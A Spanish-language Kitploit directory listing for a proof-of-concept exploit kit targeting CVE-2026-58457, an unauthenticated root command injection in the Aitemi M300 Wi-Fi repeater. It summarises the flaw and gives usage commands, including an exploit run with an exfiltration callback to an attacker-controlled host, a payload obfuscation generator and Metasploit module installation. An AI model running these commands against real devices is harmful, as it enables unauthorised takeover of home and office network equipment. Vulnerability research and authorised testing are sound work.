Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-58457 — Herramientas PoC para CVE-2026-58457: Inyección de comandos del sistema operativo no autenticada que conduce a root remoto en el repetidor Wi-Fi Shenzhen Aitemi M300 (MT02). Incluye exploit, validador, generador de payloads y módulo de Metasploit. Solo para pentesting educativo y autorizado. | Kitploit
Herramientas/GitHubGitHub/j4ck3lsyn-gen2/cve-2026-58457
Frameworks de ExploitsSeguridad IoTGeneración de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad InalámbricaPruebas de PenetraciónComando y Control
Aprendizaje y Educación
GitHubj4ck3lsyn-gen2/cve-2026-58457

CVE-2026-58457

Ver Repositorio
25hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

Herramientas PoC para CVE-2026-58457: Inyección de comandos del sistema operativo no autenticada que conduce a root remoto en el repetidor Wi-Fi Shenzhen Aitemi M300 (MT02). Incluye exploit, validador, generador de payloads y módulo de Metasploit. Solo para pentesting educativo y autorizado.

Compartir

CVE-2026-58457 - Inyección de comandos del sistema operativo no autenticada en el repetidor Wi-Fi Shenzhen Aitemi M300

[!WARNING] Este código se proporciona tal cual, únicamente con fines educativos y de investigación. No utilice este PoC en sistemas de producción, entornos compartidos ni en objetivos no autorizados.

  • Ejecutar o alojar este código puede provocar detecciones de antivirus, alertas de monitoreo de seguridad o consecuencias legales si se usa indebidamente.
  • Los autores y mantenedores del repositorio no asumen ninguna responsabilidad por daños, uso indebido o actividad ilegal derivados de este código.
  • Úselo exclusivamente en entornos de laboratorio aislados con la autorización adecuada. Destinado únicamente a investigación defensiva, análisis de vulnerabilidades y pruebas de blue team.

Resumen de la vulnerabilidad

Existe una vulnerabilidad de inyección de comandos del sistema operativo no autenticada en el manejador smacfilter_conf. Los parámetros GET name, enable y mac se pasan sin sanear a una llamada que construye comandos UCI ejecutados como .

sprintf()
root
  • Gravedad: Crítica (CVSS 9.8)
  • Impacto: Ejecución remota de comandos como root sin autenticación requerida

Herramientas Incluidas

  • poc.py - Exploit completo con soporte HTTPS, reintentos, tiempo de espera y exfiltración mediante callback.
  • val.py - Validador de vulnerabilidades pasivo y seguro (usa el comando id, inofensivo).
  • gen.py - Generador avanzado de payloads con múltiples técnicas de ofuscación.
  • MITIGATIONS.md - Medidas defensivas recomendadas.
  • Módulo Metasploit - Disponible en el directorio exploit/.

Instalación

root@kitploit:~
pip install requests

Uso Rápido

  1. Validar (Seguro)
root@kitploit:~
python3 val.py --target 192.168.1.100
  1. Explotar (Solo Pruebas Autorizadas)
root@kitploit:~
python3 poc.py --target 192.168.1.100 --cmd "id"
python3 poc.py --target 192.168.1.100 --cmd "id" --callback http://your-ip:8080/
  1. Generar Payloads Ofuscados
root@kitploit:~
python3 gen.py -c "id" -n 10

Metasploit

  1. Mover el módulo
root@kitploit:~
cp ./aitemi_m300_smacfilter_rce.rb ~/.msf4/modules/exploits/linux/http/
# or the main MSF path: /usr/share/metasploit-framework/modules/exploits/linux/http/
  1. Recargar todo
root@kitploit:~
msfconsole -q -x "reload_all"

Referencias

  • CVE-2026-58457
  • Aviso de VulnCheck
  • Divulgación en GitHub

Las estrellas y contribuciones son bienvenidas - especialmente mejoras para bypasses o variantes adicionales de firmware.

Descargar herramienta